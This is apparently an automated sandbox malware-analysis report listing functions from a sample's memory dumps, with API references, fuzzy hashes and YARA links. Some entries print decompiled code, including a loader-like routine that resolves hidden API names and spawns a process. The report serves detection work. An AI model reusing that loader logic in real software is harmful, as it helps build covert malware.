Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 291b08d80bbcf1cad06554b08a67108ead4c7888d6b265b00c02edbea7ca5bd7
Instruction ID: 8344a997d035d01d8d31d7c581a4efe81f523b45253fe8337f407753ab634dd3
Opcode Fuzzy Hash: 291b08d80bbcf1cad06554b08a67108ead4c7888d6b265b00c02edbea7ca5bd7
Instruction Fuzzy Hash: 45414A72D00219FBCF11AFA4CC48ADEBBB5EF48354F054191E906AB220D7359B21EF90

Uniqueness

Uniqueness Score: -1.00%

Function 001BDFD0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 198timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32(?,?,00000001,00000000,00000000,00000000,004D8488), ref: 001BE024
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001), ref: 001BE04A
GetLastError.KERNEL32 ref: 001BE054
CloseHandle.KERNEL32(?), ref: 001BE084
GetQueuedCompletionStatus.KERNEL32(00000000,00000000,?,?,?), ref: 001BE19E

Strings

pqcs, xrefs: 001BE20E
PkH, xrefs: 001BE05F, 001BE15B, 001BE1C7

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CompletionQueuedStatus$CloseErrorHandleLastPostTimerWaitable
String ID: PkH$pqcs
API String ID: 3092740338-3610218348
Opcode ID: 0b157ef7916dc8d913cd343b61bcca49bf008bd4bfd501a1264b5d8ee221ff3b
Instruction ID: f6104671f4d497a9cba0e3051339c2c0b4095d7ca805b05496a4ad82c783410b
Opcode Fuzzy Hash: 0b157ef7916dc8d913cd343b61bcca49bf008bd4bfd501a1264b5d8ee221ff3b
Instruction Fuzzy Hash: 40716A70A0061AAFDB19DF59D844BEEBBF8FF08714F144169E815A7680DB75A904CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 001BE220, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,004D8488,?,00000001), ref: 001BE276
GetLastError.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,004D8488), ref: 001BE280
TlsGetValue.KERNEL32 ref: 001BE31B
TlsSetValue.KERNEL32(?), ref: 001BE32E
TlsSetValue.KERNEL32(?,?,00000000,?), ref: 001BE375

Strings

pqcs, xrefs: 001BE3B9
PkH, xrefs: 001BE28B, 001BE2B5

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Value$CompletionErrorLastPostQueuedStatus
String ID: PkH$pqcs
API String ID: 1352505536-3610218348
Opcode ID: ab0abdf78624764a696c66d7978be5608f724ccf5947e0c3d8a1a165d9dc8cd9
Instruction ID: 1d9d6967ffced2e9ec4133c821bd12ec333d9abbe8793e709071165c0b743d77
Opcode Fuzzy Hash: ab0abdf78624764a696c66d7978be5608f724ccf5947e0c3d8a1a165d9dc8cd9
Instruction Fuzzy Hash: 185180B2A00209AFDB15DFA5E844BDEB7F9FF58314F14413AE905E7250EB35A9048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D41E0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 198networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00001F40), ref: 001D430B
htonl.WS2_32 ref: 001D4324
htonl.WS2_32(00000000), ref: 001D432B
htons.WS2_32(00001F40), ref: 001D433E

Strings

O', xrefs: 001D427B
PkH, xrefs: 001D4293

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: htonlhtons
String ID: O'$PkH
API String ID: 493294928-2177861401
Opcode ID: faf664cbb6dcdf6546ed8c07a54075aeb1df84c8a14f32edba82c71257756682
Instruction ID: 64291fb09ea39d7fb6dc6783c3a3ba2aa0a60c37243bb3a0a55facb6e8eda90b
Opcode Fuzzy Hash: faf664cbb6dcdf6546ed8c07a54075aeb1df84c8a14f32edba82c71257756682
Instruction Fuzzy Hash: 8E61DB70D04348DFDB20DF68E845B9ABBF4FB18310F00866EE8459B391E7B5A948CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00363503, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00367E1A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00367E4C

_free.LIBCMT ref: 00363612
_free.LIBCMT ref: 00363629
_free.LIBCMT ref: 00363646
_free.LIBCMT ref: 00363661
_free.LIBCMT ref: 00363678

Strings

WG, xrefs: 00363556

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID: WG
API String ID: 3033488037-3662577746
Opcode ID: 53a43a9efafa752d63bd43c164a3f2bc6dc28c55cf51a59a628c58cc78f525b9
Instruction ID: ec712beff29acfd0a753bb5fa8348113bd67e2e949be7ef83af92cacb01c55ac
Opcode Fuzzy Hash: 53a43a9efafa752d63bd43c164a3f2bc6dc28c55cf51a59a628c58cc78f525b9
Instruction Fuzzy Hash: 9451F471A00704EFDB22DF29CC81B6AB7F4EF55720F15856AE40ADB294E771DA11CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA689F0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6DA68A27
___except_validate_context_record.LIBVCRUNTIME ref: 6DA68A2F
_ValidateLocalCookies.LIBCMT ref: 6DA68AB8
__IsNonwritableInCurrentImage.LIBCMT ref: 6DA68AE3
_ValidateLocalCookies.LIBCMT ref: 6DA68B38

Strings

csm, xrefs: 6DA68ACD

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 149f3608161f0b71a47edf87fd2e7321b7ce67211544e35160a00bfaf04aad3a
Instruction ID: 7175237862e1c6b8c406d53cf022d324910942653427fc528648f9983e17559b
Opcode Fuzzy Hash: 149f3608161f0b71a47edf87fd2e7321b7ce67211544e35160a00bfaf04aad3a
Instruction Fuzzy Hash: EA51B17490C289EBCB00CF78C880AAEBBB9EF46218F198555ED159B295D731D985CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE3485, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02CE3485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02CE4944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02CEA789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2ced260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2ced2a8; // 0xeba5a8
					_t18 = _t47 + 0x2cee3e6; // 0x73797325
					_t68 = E02CE7912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2ced2a8; // 0xeba5a8
						_t19 = _t50 + 0x2cee747; // 0x3ba8cef
						_t20 = _t50 + 0x2cee0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02CE3179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02CE3179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2ced238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02CE8B22(_t70);
				goto L12;
			}

0x02ce348d
0x02ce348d
0x02ce349c
0x02ce34a3
0x02ce34a8
0x02ce35b5
0x02ce35bc
0x02ce35bc
0x02ce34b7
0x02ce34bf
0x02ce34c2
0x02ce34c7
0x02ce34dc
0x02ce34e2
0x02ce34e3
0x02ce34e6
0x02ce34ec
0x02ce34ef
0x02ce34f4
0x02ce34fc
0x02ce3508
0x02ce350c
0x02ce359c
0x02ce3512
0x02ce3512
0x02ce3517
0x02ce351e
0x02ce3532
0x02ce3536
0x02ce3585
0x02ce3538
0x02ce3539
0x02ce3540
0x02ce3559
0x02ce355b
0x02ce355f
0x02ce3566
0x02ce3580
0x02ce3568
0x02ce3571
0x02ce3576
0x02ce3576
0x02ce3566
0x02ce3594
0x02ce3594
0x02ce350c
0x02ce35a3
0x02ce35ac
0x02ce35b0
0x00000000

APIs

Part of subcall function 02CE4944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02CE34A1,?,00000001,?,?,00000000,00000000), ref: 02CE4969
Part of subcall function 02CE4944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02CE498B
Part of subcall function 02CE4944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02CE49A1
Part of subcall function 02CE4944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02CE49B7
Part of subcall function 02CE4944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02CE49CD
Part of subcall function 02CE4944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02CE49E3

memset.NTDLL ref: 02CE34EF

Part of subcall function 02CE7912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02CE3508,73797325), ref: 02CE7923
Part of subcall function 02CE7912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02CE793D

GetModuleHandleA.KERNEL32(4E52454B,03BA8CEF,73797325), ref: 02CE3525
GetProcAddress.KERNEL32(00000000), ref: 02CE352C
HeapFree.KERNEL32(00000000,00000000), ref: 02CE3594

Part of subcall function 02CE3179: GetProcAddress.KERNEL32(36776F57,02CE8BDC), ref: 02CE3194

CloseHandle.KERNEL32(00000000,00000001), ref: 02CE3571
CloseHandle.KERNEL32(?), ref: 02CE3576
GetLastError.KERNEL32(00000001), ref: 02CE357A

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 6f6de7bdaa454648efea138a98cdc3155485b8cc1344b74d091adf179976fb66
Instruction ID: c3c7d1ba6dfda8fa7a17c182f6a53c0209081995c91f949ed3105310fc95ac4a
Opcode Fuzzy Hash: 6f6de7bdaa454648efea138a98cdc3155485b8cc1344b74d091adf179976fb66
Instruction Fuzzy Hash: 613110B2C00248EFDF10AFA4DC88EAEBBBDEB44354F054965E606A7210D734AE54DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001BA3B0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(004D8488), ref: 001BA3DD
GetLastError.KERNEL32 ref: 001BA3EA
TlsAlloc.KERNEL32(004D8488,00000000,?,?), ref: 001BA46D
GetLastError.KERNEL32(?,?), ref: 001BA47A

Strings

tss, xrefs: 001BA427, 001BA4B7
PkH, xrefs: 001BA3F5, 001BA485

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: AllocErrorLast
String ID: PkH$tss
API String ID: 4252645092-96413838
Opcode ID: 2c67112069fb27fc0d491dd4e341834124b28d1d865eea184259671e10eab172
Instruction ID: bb9517971aecfea4c9b477e9590a05def10e276ad6ed8dd0486b1a4f9c61f9c9
Opcode Fuzzy Hash: 2c67112069fb27fc0d491dd4e341834124b28d1d865eea184259671e10eab172
Instruction Fuzzy Hash: 8E31D5719046499FCB11FFB4E8057EEBBF8EB04720F14466AE825E37C0E77859048B85

Uniqueness

Uniqueness Score: -1.00%

Function 00351354, Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 0035137C
DName::DName.LIBVCRUNTIME ref: 003513A9

Part of subcall function 0034EB34: __aulldvrm.LIBCMT ref: 0034EB65

DName::operator+.LIBCMT ref: 003513C4
DName::DName.LIBVCRUNTIME ref: 003513E1
DName::DName.LIBVCRUNTIME ref: 00351411
DName::DName.LIBVCRUNTIME ref: 0035141B
DName::DName.LIBVCRUNTIME ref: 00351442

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: e687488385a0d852811b097d14cf9613c097379c451e82f4435ab21a5ccc97c5
Instruction ID: 7e866b6d24fc4ac51a3e8b431b42b3bd40ff1f7c9bb8f4e8ac8d7acc4a6fed51
Opcode Fuzzy Hash: e687488385a0d852811b097d14cf9613c097379c451e82f4435ab21a5ccc97c5
Instruction Fuzzy Hash: 953124B19442449ACB0ADFA4C891FECBBB8BF05301F14415DE8426F6A1DB746A8DCB11

Uniqueness

Uniqueness Score: -1.00%

Function 001C0FB0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?,?,?,?,00000000,?,?,00000000), ref: 001C106D
RtlEnterCriticalSection.NTDLL(?), ref: 001C107B
RtlLeaveCriticalSection.NTDLL(?), ref: 001C10A5

Part of subcall function 001BE510: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 001BE536
Part of subcall function 001BE510: RtlEnterCriticalSection.NTDLL(?), ref: 001BE544
Part of subcall function 001BE510: RtlLeaveCriticalSection.NTDLL(?), ref: 001BE56E

Strings

PkH, xrefs: 001C1064

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$CompletionEnterLeavePostQueuedStatus
String ID: PkH
API String ID: 2946045947-1844677740
Opcode ID: 30b89f940fe55290375bbb7d5a5586b409e8d440a90a9200a3bec75a7532c520
Instruction ID: 096d6a7da7e27717efdf56ea5745ce82aedecaad0b69cdbcff379c1ab60b5c8a
Opcode Fuzzy Hash: 30b89f940fe55290375bbb7d5a5586b409e8d440a90a9200a3bec75a7532c520
Instruction Fuzzy Hash: EC31CEB2100645EFD7208F15E984B9ABBA8FF15324F10851EF9168B691D775F8A4CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE57DD, Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE57DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02CE1525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E02CE8B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02CE29C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02ce57dd
0x02ce57dd
0x02ce57ed
0x02ce57f0
0x02ce57f4
0x02ce57fa
0x02ce57ff
0x02ce5818
0x02ce582c
0x02ce5833
0x02ce583a
0x02ce588d
0x02ce5893
0x02ce5899
0x02ce58d4
0x02ce58da
0x00000000
0x00000000
0x00000000
0x02ce5899
0x02ce5840
0x00000000
0x02ce5847
0x02ce5855
0x02ce5858
0x02ce585b
0x02ce5867
0x02ce586b
0x02ce58cd
0x02ce586d
0x02ce587f
0x02ce58bd
0x02ce58c8
0x02ce5881
0x02ce5884
0x02ce5888
0x02ce5888
0x02ce587f
0x00000000
0x02ce586b
0x02ce5840
0x02ce5804
0x02ce580a
0x02ce580d
0x02ce5812
0x00000000
0x00000000
0x00000000
0x02ce58a2
0x02ce58aa
0x02ce58af
0x02ce58b2
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76D681D0), ref: 02CE57F4
SetEvent.KERNEL32(?), ref: 02CE5804
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02CE5836
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02CE585B
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02CE587B
GetLastError.KERNEL32 ref: 02CE588D

Part of subcall function 02CE29C0: WaitForMultipleObjects.KERNEL32(00000002,02CEA923,00000000,02CEA923,?,?,?,02CEA923,0000EA60), ref: 02CE29DB

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

GetLastError.KERNEL32(00000000), ref: 02CE58C2

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: 5382bce063e5cba01cda0275fcf07e4ee881679d241788da81cfdd3754537f1d
Instruction ID: 9fd489a14956e8012be61484fe4fdf5d5630ed829c4fccc62d59164698cb46b6
Opcode Fuzzy Hash: 5382bce063e5cba01cda0275fcf07e4ee881679d241788da81cfdd3754537f1d
Instruction Fuzzy Hash: E63106B5D40308EFDF30DFA5C880A9EBBB8EF08248F50496AE513A6250D770AB44DF61

Uniqueness

Uniqueness Score: -1.00%

Function 6DA8655B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 6DA865B2
ext-ms-, xrefs: 6DA865C6

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 6d7aebe9b610e8216f61cdf4233247aa5604b4684e2b55716bac62f19ca1ae6c
Instruction ID: 97149ac881dd00a19007a4cab96d974f99e9b026ced1a53a90bbfb11e8e1e5f2
Opcode Fuzzy Hash: 6d7aebe9b610e8216f61cdf4233247aa5604b4684e2b55716bac62f19ca1ae6c
Instruction Fuzzy Hash: 2621C675D6D252ABFB174B288C44B6A3768AB06764F1D0130ED17BB386D730E940CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE7B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E02CE7B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2ced2a8; // 0xeba5a8
				_t1 = _t9 + 0x2cee62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02CEA055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02CE1525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02CE1188(_t34, _t41, _a8);
						E02CE8B22(_t41);
						_t42 = E02CE976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02CE8B22(_t36);
							_t36 = _t42;
						}
						_t43 = E02CEA41C(_t36, _t33);
						if(_t43 != 0) {
							E02CE8B22(_t36);
							_t36 = _t43;
						}
					}
					E02CE8B22(_t28);
				}
				return _t36;
			}

0x02ce7b8d
0x02ce7b90
0x02ce7b91
0x02ce7b99
0x02ce7ba0
0x02ce7ba7
0x02ce7bab
0x02ce7bb1
0x02ce7bb8
0x02ce7bbd
0x02ce7bcf
0x02ce7bd3
0x02ce7bd7
0x02ce7bdd
0x02ce7be2
0x02ce7bf2
0x02ce7bf4
0x02ce7c0b
0x02ce7c0f
0x02ce7c12
0x02ce7c17
0x02ce7c17
0x02ce7c20
0x02ce7c24
0x02ce7c27
0x02ce7c2c
0x02ce7c2c
0x02ce7c24
0x02ce7c2f
0x02ce7c2f
0x02ce7c3a

APIs

Part of subcall function 02CEA055: lstrlen.KERNEL32(00000000,00000000,00000000,73FCC740,?,?,?,02CE7BA7,253D7325,00000000,00000000,73FCC740,?,?,02CE9DA0,?), ref: 02CEA0BC
Part of subcall function 02CEA055: sprintf.NTDLL ref: 02CEA0DD

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BB8
lstrlen.KERNEL32(?,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BC0

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

strcpy.NTDLL ref: 02CE7BD7
lstrcat.KERNEL32(00000000,?), ref: 02CE7BE2

Part of subcall function 02CE1188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02CE7BF1,00000000,?,?,?,02CE9DA0,?,03BA95B0), ref: 02CE119F

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BFF

Part of subcall function 02CE976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02CE7C0B,00000000,?,?,02CE9DA0,?,03BA95B0), ref: 02CE9779
Part of subcall function 02CE976F: _snprintf.NTDLL ref: 02CE97D7

Strings

=, xrefs: 02CE7BF9

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 63df06589a4e6aa2ca429da41c091510cf66f0057178fde7b1a60732ecd7facd
Instruction ID: 816f306f9f47b5358d058c905f76b601f8989661874703f69d5c017d41b96095
Opcode Fuzzy Hash: 63df06589a4e6aa2ca429da41c091510cf66f0057178fde7b1a60732ecd7facd
Instruction Fuzzy Hash: 1A11C6739016257B4F227BB4AC84CAFB6AEDE887643050615F907EB100DF34CE06ABE1

Uniqueness

Uniqueness Score: -1.00%

Function 0036D337, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0036D083: _free.LIBCMT ref: 0036D0A8

_free.LIBCMT ref: 0036D385

Part of subcall function 00365F88: HeapFree.KERNEL32(00000000,00000000,?,0036D0AD,?,00000000,?,?,?,0036D350,?,00000007,?,?,0036D946,?), ref: 00365F9E
Part of subcall function 00365F88: GetLastError.KERNEL32(?,?,0036D0AD,?,00000000,?,?,?,0036D350,?,00000007,?,?,0036D946,?,?), ref: 00365FB0

_free.LIBCMT ref: 0036D390
_free.LIBCMT ref: 0036D39B
_free.LIBCMT ref: 0036D3EF
_free.LIBCMT ref: 0036D3FA
_free.LIBCMT ref: 0036D405
_free.LIBCMT ref: 0036D410

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 966831b78ca923aff4bb80dcacd48b8c9b75351ddeac1eb365168dcaa10b9c14
Instruction ID: cb00be09dd8faa8f31eba117e9c2cf9dce827358b9673da56a345def81829925
Opcode Fuzzy Hash: 966831b78ca923aff4bb80dcacd48b8c9b75351ddeac1eb365168dcaa10b9c14
Instruction Fuzzy Hash: 7B112E71A40B04FADE32BBB0CC07FCB77ECAF58740F408D25B299AE096DA75B5158651

Uniqueness

Uniqueness Score: -1.00%

Function 6DA95281, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6DA94FCD: _free.LIBCMT ref: 6DA94FF2

_free.LIBCMT ref: 6DA952CF

Part of subcall function 6DA85D5B: RtlFreeHeap.NTDLL(00000000,00000000,?,6DA76800,?,00000000,?,6DA68B9E,00000000,00000011,00000001), ref: 6DA85D71
Part of subcall function 6DA85D5B: GetLastError.KERNEL32(00000000,?,6DA76800,?,00000000,?,6DA68B9E,00000000,00000011,00000001), ref: 6DA85D83

_free.LIBCMT ref: 6DA952DA
_free.LIBCMT ref: 6DA952E5
_free.LIBCMT ref: 6DA95339
_free.LIBCMT ref: 6DA95344
_free.LIBCMT ref: 6DA9534F
_free.LIBCMT ref: 6DA9535A

Memory Dump Source

